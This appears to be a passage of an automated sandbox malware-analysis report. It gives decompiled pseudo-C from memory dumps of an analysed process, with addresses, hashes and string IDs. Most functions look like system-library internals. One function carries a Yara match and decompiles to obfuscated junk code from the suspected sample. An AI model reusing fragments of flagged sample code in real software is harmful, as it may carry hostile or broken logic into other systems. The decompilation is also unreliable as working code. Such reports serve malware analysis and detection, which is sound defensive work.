                                                                      				_t83 = __edx;
                                                                      				_t117 = 0;
                                                                      				_t120 = __ecx;
                                                                      				_v44 = 0;
                                                                      				if(E00ABFF69(__ecx,  &_v44,  &_v32) < 0) {
                                                                      					L24:
                                                                      					_t109 = _v44;
                                                                      					if(_v44 != 0) {
                                                                      						E00AC1074(_t83, _t120, _t109, _t117, _t117);
                                                                      					}
                                                                      					L26:
                                                                      					return _t117;
                                                                      				}
                                                                      				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                                                      				_t5 = _t83 + 1; // 0x1
                                                                      				_v36 = _t5 << 0xc;
                                                                      				_v40 = _t93;
                                                                      				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                                                      				asm("sbb ebx, ebx");
                                                                      				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                                                      				if(_t58 != 0) {
                                                                      					_push(0);
                                                                      					_push(0x14);
                                                                      					_push( &_v24);
                                                                      					_push(3);
                                                                      					_push(_t93);
                                                                      					_push(0xffffffff);
                                                                      					_t80 = E00A39730();
                                                                      					_t115 = _v64;
                                                                      					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                                                      						_push(_t93);
                                                                      						E00ABA80D(_t115, 1, _v20, _t117);
                                                                      						_t83 = 4;
                                                                      					}
                                                                      				}
                                                                      				if(E00ABA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                                                      					goto L24;
                                                                      				}
                                                                      				_t60 = _v32;
                                                                      				_t97 = (_t60 != 0x100000) + 1;
                                                                      				_t83 = (_v44 -  *0xae8b04 >> 0x14) + (_v44 -  *0xae8b04 >> 0x14);
                                                                      				_v28 = (_t60 != 0x100000) + 1;
                                                                      				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                                                      				_v40 = _t62;
                                                                      				if(_t83 >= _t62) {
                                                                      					L10:
                                                                      					asm("lock xadd [eax], ecx");
                                                                      					asm("lock xadd [eax], ecx");
                                                                      					if(E00A17D50() == 0) {
                                                                      						_t67 = 0x7ffe0380;
                                                                      					} else {
                                                                      						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                      					}
                                                                      					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                      						E00AB138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                                                      					}
                                                                      					if(E00A17D50() == 0) {
                                                                      						_t69 = 0x7ffe0388;
                                                                      					} else {
                                                                      						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                      					}
                                                                      					if( *_t69 != 0) {
                                                                      						E00AAFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                                                      					}
                                                                      					if(( *0xae8724 & 0x00000008) != 0) {
                                                                      						E00AB52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                                                      					}
                                                                      					_t117 = _v44;
                                                                      					goto L26;
                                                                      				}
                                                                      				while(E00AC15B5(0xae8ae4, _t83, _t97, _t97) >= 0) {
                                                                      					_t97 = _v28;
                                                                      					_t83 = _t83 + 2;
                                                                      					if(_t83 < _v40) {
                                                                      						continue;
                                                                      					}
                                                                      					goto L10;
                                                                      				}
                                                                      				goto L24;
                                                                      			}
























                                                                      0x00ac0eb7
                                                                      0x00ac0eb9
                                                                      0x00ac0ec0
                                                                      0x00ac0ec2
                                                                      0x00ac0ecd
                                                                      0x00ac105b
                                                                      0x00ac105b
                                                                      0x00ac1061
                                                                      0x00ac1066
                                                                      0x00ac1066
                                                                      0x00ac106b
                                                                      0x00ac1073
                                                                      0x00ac1073
                                                                      0x00ac0ed3
                                                                      0x00ac0ed6
                                                                      0x00ac0edc
                                                                      0x00ac0ee0
                                                                      0x00ac0ee7
                                                                      0x00ac0ef0
                                                                      0x00ac0ef5
                                                                      0x00ac0efa
                                                                      0x00ac0efc
                                                                      0x00ac0efd
                                                                      0x00ac0f03
                                                                      0x00ac0f04
                                                                      0x00ac0f06
                                                                      0x00ac0f07
                                                                      0x00ac0f09
                                                                      0x00ac0f0e
                                                                      0x00ac0f14
                                                                      0x00ac0f23
                                                                      0x00ac0f2d
                                                                      0x00ac0f34
                                                                      0x00ac0f34
                                                                      0x00ac0f14
                                                                      0x00ac0f52
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00ac0f58
                                                                      0x00ac0f73
                                                                      0x00ac0f74
                                                                      0x00ac0f79
                                                                      0x00ac0f7d
                                                                      0x00ac0f80
                                                                      0x00ac0f86
                                                                      0x00ac0fab
                                                                      0x00ac0fb5
                                                                      0x00ac0fc6
                                                                      0x00ac0fd1
                                                                      0x00ac0fe3
                                                                      0x00ac0fd3
                                                                      0x00ac0fdc
                                                                      0x00ac0fdc
                                                                      0x00ac0feb
                                                                      0x00ac1009
                                                                      0x00ac1009
                                                                      0x00ac1015
                                                                      0x00ac1027
                                                                      0x00ac1017
                                                                      0x00ac1020
                                                                      0x00ac1020
                                                                      0x00ac102f
                                                                      0x00ac103c
                                                                      0x00ac103c
                                                                      0x00ac1048
                                                                      0x00ac1050
                                                                      0x00ac1050
                                                                      0x00ac1055
                                                                      0x00000000
                                                                      0x00ac1055
                                                                      0x00ac0f88
                                                                      0x00ac0f9e
                                                                      0x00ac0fa2
                                                                      0x00ac0fa9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00ac0fa9
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `
                                                                      • API String ID: 0-2679148245
                                                                      • Opcode ID: 494b872b9f8b2602d216d8c93a1b1af2a1af1696c1701b5f67beb84f707e4277
                                                                      • Instruction ID: f2232e8a4af2cb4e605f0bd2f776040e49d0f6f24b87c965489b05a78bec9829
                                                                      • Opcode Fuzzy Hash: 494b872b9f8b2602d216d8c93a1b1af2a1af1696c1701b5f67beb84f707e4277
                                                                      • Instruction Fuzzy Hash: 2651AE703083819FD725DF28D981F2BB7E9EBC5304F05092CF99697292D670E885CB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E00A2F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                                                      				intOrPtr _v8;
                                                                      				intOrPtr _v12;
                                                                      				intOrPtr _v16;
                                                                      				char* _v20;
                                                                      				intOrPtr _v24;
                                                                      				char _v28;
                                                                      				intOrPtr _v32;
                                                                      				char _v36;
                                                                      				char _v44;
                                                                      				char _v52;
                                                                      				intOrPtr _v56;
                                                                      				char _v60;
                                                                      				intOrPtr _v72;
                                                                      				void* _t51;
                                                                      				void* _t58;
                                                                      				signed short _t82;
                                                                      				short _t84;
                                                                      				signed int _t91;
                                                                      				signed int _t100;
                                                                      				signed short* _t103;
                                                                      				void* _t108;
                                                                      				intOrPtr* _t109;
                                                                      
                                                                      				_t103 = __ecx;
                                                                      				_t82 = __edx;
                                                                      				_t51 = E00A14120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                                                      				if(_t51 >= 0) {
                                                                      					_push(0x21);
                                                                      					_push(3);
                                                                      					_v56 =  *0x7ffe02dc;
                                                                      					_v20 =  &_v52;
                                                                      					_push( &_v44);
                                                                      					_v28 = 0x18;
                                                                      					_push( &_v28);
                                                                      					_push(0x100020);
                                                                      					_v24 = 0;
                                                                      					_push( &_v60);
                                                                      					_v16 = 0x40;
                                                                      					_v12 = 0;
                                                                      					_v8 = 0;
                                                                      					_t58 = E00A39830();
                                                                      					_t87 =  *[fs:0x30];
                                                                      					_t108 = _t58;
                                                                      					L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                                                      					if(_t108 < 0) {
                                                                      						L11:
                                                                      						_t51 = _t108;
                                                                      					} else {
                                                                      						_push(4);
                                                                      						_push(8);
                                                                      						_push( &_v36);
                                                                      						_push( &_v44);
                                                                      						_push(_v60);
                                                                      						_t108 = E00A39990();
                                                                      						if(_t108 < 0) {
                                                                      							L10:
                                                                      							_push(_v60);
                                                                      							E00A395D0();
                                                                      							goto L11;
                                                                      						} else {
                                                                      							_t109 = L00A14620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                                                      							if(_t109 == 0) {
                                                                      								_t108 = 0xc0000017;
                                                                      								goto L10;
                                                                      							} else {
                                                                      								_t21 = _t109 + 0x18; // 0x18
                                                                      								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                                                      								 *_t109 = 1;
                                                                      								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                                                      								 *(_t109 + 0xe) = _t82;
                                                                      								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                                                      								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                                                      								E00A3F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                                                      								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                      								 *((short*)(_t109 + 0xc)) =  *_t103;
                                                                      								_t91 =  *_t103 & 0x0000ffff;
                                                                      								_t100 = _t91 & 0xfffffffe;
                                                                      								_t84 = 0x5c;
                                                                      								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                                                      									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                                                      										_push(_v60);
                                                                      										E00A395D0();
                                                                      										L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                                                      										_t51 = 0xc0000106;
                                                                      									} else {
                                                                      										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                                                      										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                      										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                                                      										goto L5;
                                                                      									}
                                                                      								} else {
                                                                      									L5:
                                                                      									 *_a4 = _t109;
                                                                      									_t51 = 0;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return _t51;
                                                                      			}

























                                                                      0x00a2f0d3
                                                                      0x00a2f0d9
                                                                      0x00a2f0e0
                                                                      0x00a2f0e7
                                                                      0x00a2f0f2
                                                                      0x00a2f0f4
                                                                      0x00a2f0f8
                                                                      0x00a2f100
                                                                      0x00a2f108
                                                                      0x00a2f10d
                                                                      0x00a2f115
                                                                      0x00a2f116
                                                                      0x00a2f11f
                                                                      0x00a2f123
                                                                      0x00a2f124
                                                                      0x00a2f12c
                                                                      0x00a2f130
                                                                      0x00a2f134
                                                                      0x00a2f13d
                                                                      0x00a2f144
                                                                      0x00a2f14b
                                                                      0x00a2f152
                                                                      0x00a6bab0
                                                                      0x00a6bab0
                                                                      0x00a2f158
                                                                      0x00a2f158
                                                                      0x00a2f15a
                                                                      0x00a2f160
                                                                      0x00a2f165
                                                                      0x00a2f166
                                                                      0x00a2f16f
                                                                      0x00a2f173
                                                                      0x00a6baa7
                                                                      0x00a6baa7
                                                                      0x00a6baab
                                                                      0x00000000
                                                                      0x00a2f179
                                                                      0x00a2f18d
                                                                      0x00a2f191
                                                                      0x00a6baa2
                                                                      0x00000000
                                                                      0x00a2f197
                                                                      0x00a2f19b
                                                                      0x00a2f1a2
                                                                      0x00a2f1a9
                                                                      0x00a2f1af
                                                                      0x00a2f1b2
                                                                      0x00a2f1b6
                                                                      0x00a2f1b9
                                                                      0x00a2f1c4
                                                                      0x00a2f1d8
                                                                      0x00a2f1df
                                                                      0x00a2f1e3
                                                                      0x00a2f1eb
                                                                      0x00a2f1ee
                                                                      0x00a2f1f4
                                                                      0x00a2f20f
                                                                      0x00a6bab7
                                                                      0x00a6babb
                                                                      0x00a6bacc
                                                                      0x00a6bad1
                                                                      0x00a2f215
                                                                      0x00a2f218
                                                                      0x00a2f226
                                                                      0x00a2f22b
                                                                      0x00000000
                                                                      0x00a2f22b
                                                                      0x00a2f1f6
                                                                      0x00a2f1f6
                                                                      0x00a2f1f9
                                                                      0x00a2f1fb
                                                                      0x00a2f1fb
                                                                      0x00a2f1f4
                                                                      0x00a2f191
                                                                      0x00a2f173
                                                                      0x00a2f152
                                                                      0x00a2f203

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @
                                                                      • API String ID: 0-2766056989
                                                                      • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                      • Instruction ID: 1cd8ab9590adf313794ae92e5ff100a3773ae2dbd916572410617cd019a450d0
                                                                      • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                      • Instruction Fuzzy Hash: 11519D71504710AFC321DF59C841A6BB7F8FF48710F108A2DF99587690E7B4E954CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 53%
                                                                      			E0040C326(void* __eax, signed int* __ebx, signed int __ecx, void* __edx, void* __esi) {
                                                                      				signed int _t25;
                                                                      				signed int* _t29;
                                                                      				signed char _t35;
                                                                      				signed int _t37;
                                                                      				signed char _t38;
                                                                      				intOrPtr* _t39;
                                                                      				signed int _t46;
                                                                      				signed int _t49;
                                                                      				signed int _t54;
                                                                      				signed char _t57;
                                                                      
                                                                      				_t43 = __esi;
                                                                      				_t34 = __ecx;
                                                                      				_t29 = __ebx;
                                                                      				_t25 = __eax + 0x13;
                                                                      				_push(es);
                                                                      				asm("sbb eax, 0xf7950914");
                                                                      				_t37 = __edx - 1;
                                                                      				_t39 = 0x1686e0f8;
                                                                      				if(_t37 < 0) {
                                                                      					L6:
                                                                      					_t38 = 0xf6;
                                                                      					if(_t54 < 0) {
                                                                      						asm("adc al, 0x1e");
                                                                      						 *_t25 =  *_t25 & 0x000000f6;
                                                                      						asm("adc bl, cl");
                                                                      						asm("das");
                                                                      						_t38 = 0x2b83eba8;
                                                                      						L8:
                                                                      						_t39 = _t39 -  *_t39 +  *((intOrPtr*)(_t39 -  *_t39));
                                                                      						L9:
                                                                      						asm("iretd");
                                                                      						_pop(_t29);
                                                                      					}
                                                                      					L11:
                                                                      					asm("jecxz 0xb");
                                                                      					asm("cld");
                                                                      					_t38 = _t38 | _t29[0x1cc96b6c];
                                                                      					asm("fsubr dword [esi-0x7a15ce99]");
                                                                      					asm("loop 0xffffffdb");
                                                                      					_t34 = _t34 &  *(_t49 + _t46 + 0xd28a7d5);
                                                                      					asm("loop 0x74");
                                                                      					asm("popfd");
                                                                      					_t25 =  *_t29 * 0xe38756e0 ^ 0xe6cd3779;
                                                                      					_t20 = _t25 - 0x70;
                                                                      					 *_t20 =  *(_t25 - 0x70) << 1;
                                                                      					_t57 =  *_t20;
                                                                      					asm("outsb");
                                                                      					_push(_t43);
                                                                      					if(_t57 >= 0) {
                                                                      						goto L4;
                                                                      					} else {
                                                                      						if(_t57 != 0) {
                                                                      							goto L8;
                                                                      						} else {
                                                                      							_t38 = _t38 ^  *(_t39 - 0x152f07d2);
                                                                      							asm("lock pushad");
                                                                      							 *[cs:edx-0x7a] =  *[cs:edx-0x7a] >> 1;
                                                                      							asm("invalid");
                                                                      							asm("loop 0x41");
                                                                      							asm("adc eax, 0xf24b586e");
                                                                      							asm("sbb al, 0xa2");
                                                                      							_t39 =  *_t34;
                                                                      							asm("sahf");
                                                                      							goto L9;
                                                                      						}
                                                                      						goto L11;
                                                                      					}
                                                                      					L15:
                                                                      				} else {
                                                                      					_t43 = __esi;
                                                                      					asm("adc [ebp+0x12], esp");
                                                                      					asm("sti");
                                                                      					_pop(_t39);
                                                                      					_t49 = _t49 & __ebx[0x8b8794d];
                                                                      					_t35 = __ecx | _t49;
                                                                      					 *(_t43 + 0x3251a05a) =  ~( *(_t43 + 0x3251a05a));
                                                                      					_t25 = 0xd4;
                                                                      					_t4 = _t43 + 0xfffffffcd8d7fc60;
                                                                      					 *_t4 =  *(_t43 + 0xfffffffcd8d7fc60) | _t35;
                                                                      					if( *_t4 >= 0) {
                                                                      						asm("stosb");
                                                                      						_t37 = 0xd4 *  *0x00000112 >> 0x20;
                                                                      						_t25 = 0xd4 *  *0x00000112;
                                                                      						asm("lock mov ebp, 0x5a6341e8");
                                                                      					}
                                                                      					_t34 = _t35 + 1;
                                                                      					asm("arpl [edx+0x4c], bx");
                                                                      					 *(_t39 + 0xa257867) =  *(_t39 + 0xa257867) & _t37;
                                                                      					_t54 = _t46 & _t37;
                                                                      					asm("int1");
                                                                      					asm("std");
                                                                      					_pop(_t46);
                                                                      				}
                                                                      				L4:
                                                                      				_t16 = _t25;
                                                                      				_t25 = _t46;
                                                                      				_t46 = _t16;
                                                                      				if(_t54 < 0) {
                                                                      					asm("pushfd");
                                                                      					goto L6;
                                                                      				}
                                                                      				return _t25;
                                                                      				goto L15;
                                                                      			}













                                                                      0x0040c326
                                                                      0x0040c326
                                                                      0x0040c326
                                                                      0x0040c326
                                                                      0x0040c328
                                                                      0x0040c329
                                                                      0x0040c32e
                                                                      0x0040c32f
                                                                      0x0040c334
                                                                      0x0040c379
                                                                      0x0040c379
                                                                      0x0040c37b
                                                                      0x0040c37d
                                                                      0x0040c37f
                                                                      0x0040c381
                                                                      0x0040c383
                                                                      0x0040c386
                                                                      0x0040c38a
                                                                      0x0040c38c
                                                                      0x0040c38e
                                                                      0x0040c38e
                                                                      0x0040c394
                                                                      0x0040c394
                                                                      0x0040c395
                                                                      0x0040c39a
                                                                      0x0040c39c
                                                                      0x0040c39d
                                                                      0x0040c3a3
                                                                      0x0040c3a9
                                                                      0x0040c3ab
                                                                      0x0040c3b2
                                                                      0x0040c3b4
                                                                      0x0040c3bb
                                                                      0x0040c3c0
                                                                      0x0040c3c0
                                                                      0x0040c3c0
                                                                      0x0040c3c3
                                                                      0x0040c3c4
                                                                      0x0040c3c5
                                                                      0x00000000
                                                                      0x0040c3c7
                                                                      0x0040c3c7
                                                                      0x00000000
                                                                      0x0040c3c9
                                                                      0x0040c3c9
                                                                      0x0040c3cf
                                                                      0x0040c3d1
                                                                      0x0040c3d5
                                                                      0x0040c3da
                                                                      0x0040c3df
                                                                      0x0040c3e4
                                                                      0x0040c3e6
                                                                      0x0040c3ea
                                                                      0x00000000
                                                                      0x0040c3ea
                                                                      0x00000000
                                                                      0x0040c3c7
                                                                      0x00000000
                                                                      0x0040c336
                                                                      0x0040c33c
                                                                      0x0040c343
                                                                      0x0040c346
                                                                      0x0040c347
                                                                      0x0040c348
                                                                      0x0040c34e
                                                                      0x0040c352
                                                                      0x0040c358
                                                                      0x0040c35a
                                                                      0x0040c35a
                                                                      0x0040c35d
                                                                      0x0040c35f
                                                                      0x0040c360
                                                                      0x0040c360
                                                                      0x0040c363
                                                                      0x0040c363
                                                                      0x0040c366
                                                                      0x0040c367
                                                                      0x0040c36a
                                                                      0x0040c370
                                                                      0x0040c372
                                                                      0x0040c373
                                                                      0x0040c374
                                                                      0x0040c374
                                                                      0x0040c375
                                                                      0x0040c375
                                                                      0x0040c375
                                                                      0x0040c375
                                                                      0x0040c376
                                                                      0x0040c378
                                                                      0x00000000
                                                                      0x0040c378
                                                                      0x0040c3fd
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: AcZ
                                                                      • API String ID: 0-2674484751
                                                                      • Opcode ID: 37def913206e897e81efec025c2d425336062b36028a909ad7cf05debfa3dbe1
                                                                      • Instruction ID: a0fe35deae11a38abcb9d2edc0737224c141f9c1237f2db68068f039ad3435ec
                                                                      • Opcode Fuzzy Hash: 37def913206e897e81efec025c2d425336062b36028a909ad7cf05debfa3dbe1
                                                                      • Instruction Fuzzy Hash: D641FC72625640CBC712DF35C881AE2FB64FF86310F5886AFD9895B182D374A609C7D5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E00A73540(intOrPtr _a4) {
                                                                      				signed int _v12;
                                                                      				intOrPtr _v88;
                                                                      				intOrPtr _v92;
                                                                      				char _v96;
                                                                      				char _v352;
                                                                      				char _v1072;
                                                                      				intOrPtr _v1140;
                                                                      				intOrPtr _v1148;
                                                                      				char _v1152;
                                                                      				char _v1156;
                                                                      				char _v1160;
                                                                      				char _v1164;
                                                                      				char _v1168;
                                                                      				char* _v1172;
                                                                      				short _v1174;
                                                                      				char _v1176;
                                                                      				char _v1180;
                                                                      				char _v1192;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				short _t41;
                                                                      				short _t42;
                                                                      				intOrPtr _t80;
                                                                      				intOrPtr _t81;
                                                                      				signed int _t82;
                                                                      				void* _t83;
                                                                      
                                                                      				_v12 =  *0xaed360 ^ _t82;
                                                                      				_t41 = 0x14;
                                                                      				_v1176 = _t41;
                                                                      				_t42 = 0x16;
                                                                      				_v1174 = _t42;
                                                                      				_v1164 = 0x100;
                                                                      				_v1172 = L"BinaryHash";
                                                                      				_t81 = E00A30BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                                                      				if(_t81 < 0) {
                                                                      					L11:
                                                                      					_t75 = _t81;
                                                                      					E00A73706(0, _t81, _t79, _t80);
                                                                      					L12:
                                                                      					if(_a4 != 0xc000047f) {
                                                                      						E00A3FA60( &_v1152, 0, 0x50);
                                                                      						_v1152 = 0x60c201e;
                                                                      						_v1148 = 1;
                                                                      						_v1140 = E00A73540;
                                                                      						E00A3FA60( &_v1072, 0, 0x2cc);
                                                                      						_push( &_v1072);
                                                                      						E00A4DDD0( &_v1072, _t75, _t79, _t80, _t81);
                                                                      						E00A80C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                                                      						_push(_v1152);
                                                                      						_push(0xffffffff);
                                                                      						E00A397C0();
                                                                      					}
                                                                      					return E00A3B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                                                      				}
                                                                      				_t79 =  &_v352;
                                                                      				_t81 = E00A73971(0, _a4,  &_v352,  &_v1156);
                                                                      				if(_t81 < 0) {
                                                                      					goto L11;
                                                                      				}
                                                                      				_t75 = _v1156;
                                                                      				_t79 =  &_v1160;
                                                                      				_t81 = E00A73884(_v1156,  &_v1160,  &_v1168);
                                                                      				if(_t81 >= 0) {
                                                                      					_t80 = _v1160;
                                                                      					E00A3FA60( &_v96, 0, 0x50);
                                                                      					_t83 = _t83 + 0xc;
                                                                      					_push( &_v1180);
                                                                      					_push(0x50);
                                                                      					_push( &_v96);
                                                                      					_push(2);
                                                                      					_push( &_v1176);
                                                                      					_push(_v1156);
                                                                      					_t81 = E00A39650();
                                                                      					if(_t81 >= 0) {
                                                                      						if(_v92 != 3 || _v88 == 0) {
                                                                      							_t81 = 0xc000090b;
                                                                      						}
                                                                      						if(_t81 >= 0) {
                                                                      							_t75 = _a4;
                                                                      							_t79 =  &_v352;
                                                                      							E00A73787(_a4,  &_v352, _t80);
                                                                      						}
                                                                      					}
                                                                      					L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                                                      				}
                                                                      				_push(_v1156);
                                                                      				E00A395D0();
                                                                      				if(_t81 >= 0) {
                                                                      					goto L12;
                                                                      				} else {
                                                                      					goto L11;
                                                                      				}
                                                                      			}































                                                                      0x00a73552
                                                                      0x00a7355a
                                                                      0x00a7355d
                                                                      0x00a73566
                                                                      0x00a73567
                                                                      0x00a7357e
                                                                      0x00a7358f
                                                                      0x00a735a1
                                                                      0x00a735a5
                                                                      0x00a7366b
                                                                      0x00a7366b
                                                                      0x00a7366d
                                                                      0x00a73672
                                                                      0x00a73679
                                                                      0x00a73685
                                                                      0x00a7368d
                                                                      0x00a7369d
                                                                      0x00a736a7
                                                                      0x00a736b8
                                                                      0x00a736c6
                                                                      0x00a736c7
                                                                      0x00a736dc
                                                                      0x00a736e1
                                                                      0x00a736e7
                                                                      0x00a736e9
                                                                      0x00a736e9
                                                                      0x00a73703
                                                                      0x00a73703
                                                                      0x00a735b5
                                                                      0x00a735c0
                                                                      0x00a735c4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a735ca
                                                                      0x00a735d7
                                                                      0x00a735e2
                                                                      0x00a735e6
                                                                      0x00a735e8
                                                                      0x00a735f5
                                                                      0x00a735fa
                                                                      0x00a73603
                                                                      0x00a73604
                                                                      0x00a73609
                                                                      0x00a7360a
                                                                      0x00a73612
                                                                      0x00a73613
                                                                      0x00a7361e
                                                                      0x00a73622
                                                                      0x00a73628
                                                                      0x00a7362f
                                                                      0x00a7362f
                                                                      0x00a73636
                                                                      0x00a73638
                                                                      0x00a7363b
                                                                      0x00a73642
                                                                      0x00a73642
                                                                      0x00a73636
                                                                      0x00a73657
                                                                      0x00a73657
                                                                      0x00a7365c
                                                                      0x00a73662
                                                                      0x00a73669
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: BinaryHash
                                                                      • API String ID: 0-2202222882
                                                                      • Opcode ID: 459964352e82612560aada9ce0016116f078e2364cd86893a7896b014dd8374a
                                                                      • Instruction ID: 8f3afddb02ccd23876394600065ea600ef56dc4965b2942d37072594c5905f4d
                                                                      • Opcode Fuzzy Hash: 459964352e82612560aada9ce0016116f078e2364cd86893a7896b014dd8374a
                                                                      • Instruction Fuzzy Hash: EB4133B2D0152CAADF21DA50CD81FEEB77CAB44714F0185A5BA0DAB241DB709F889F94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E00AC05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                                      				signed int _v20;
                                                                      				char _v24;
                                                                      				signed int _v28;
                                                                      				char _v32;
                                                                      				signed int _v36;
                                                                      				intOrPtr _v40;
                                                                      				void* __ebx;
                                                                      				void* _t35;
                                                                      				signed int _t42;
                                                                      				char* _t48;
                                                                      				signed int _t59;
                                                                      				signed char _t61;
                                                                      				signed int* _t79;
                                                                      				void* _t88;
                                                                      
                                                                      				_v28 = __edx;
                                                                      				_t79 = __ecx;
                                                                      				if(E00AC07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                                                                      					L13:
                                                                      					_t35 = 0;
                                                                      					L14:
                                                                      					return _t35;
                                                                      				}
                                                                      				_t61 = __ecx[1];
                                                                      				_t59 = __ecx[0xf];
                                                                      				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                                                                      				_v36 = _a8 << 0xc;
                                                                      				_t42 =  *(_t59 + 0xc) & 0x40000000;
                                                                      				asm("sbb esi, esi");
                                                                      				_t88 = ( ~_t42 & 0x0000003c) + 4;
                                                                      				if(_t42 != 0) {
                                                                      					_push(0);
                                                                      					_push(0x14);
                                                                      					_push( &_v24);
                                                                      					_push(3);
                                                                      					_push(_t59);
                                                                      					_push(0xffffffff);
                                                                      					if(E00A39730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                                                                      						_push(_t61);
                                                                      						E00ABA80D(_t59, 1, _v20, 0);
                                                                      						_t88 = 4;
                                                                      					}
                                                                      				}
                                                                      				_t35 = E00ABA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                                                                      				if(_t35 < 0) {
                                                                      					goto L14;
                                                                      				}
                                                                      				E00AC1293(_t79, _v40, E00AC07DF(_t79, _v28,  &_a4,  &_a8, 1));
                                                                      				if(E00A17D50() == 0) {
                                                                      					_t48 = 0x7ffe0380;
                                                                      				} else {
                                                                      					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                      				}
                                                                      				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                      					E00AB138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                                                                      				}
                                                                      				goto L13;
                                                                      			}

















                                                                      0x00ac05c5
                                                                      0x00ac05ca
                                                                      0x00ac05d3
                                                                      0x00ac06db
                                                                      0x00ac06db
                                                                      0x00ac06dd
                                                                      0x00ac06e3
                                                                      0x00ac06e3
                                                                      0x00ac05dd
                                                                      0x00ac05e7
                                                                      0x00ac05f6
                                                                      0x00ac0600
                                                                      0x00ac0607
                                                                      0x00ac0610
                                                                      0x00ac0615
                                                                      0x00ac061a
                                                                      0x00ac061c
                                                                      0x00ac061e
                                                                      0x00ac0624
                                                                      0x00ac0625
                                                                      0x00ac0627
                                                                      0x00ac0628
                                                                      0x00ac0631
                                                                      0x00ac0640
                                                                      0x00ac064d
                                                                      0x00ac0654
                                                                      0x00ac0654
                                                                      0x00ac0631
                                                                      0x00ac066d
                                                                      0x00ac0674
                                                                      0x00000000
                                                                      0x00000000
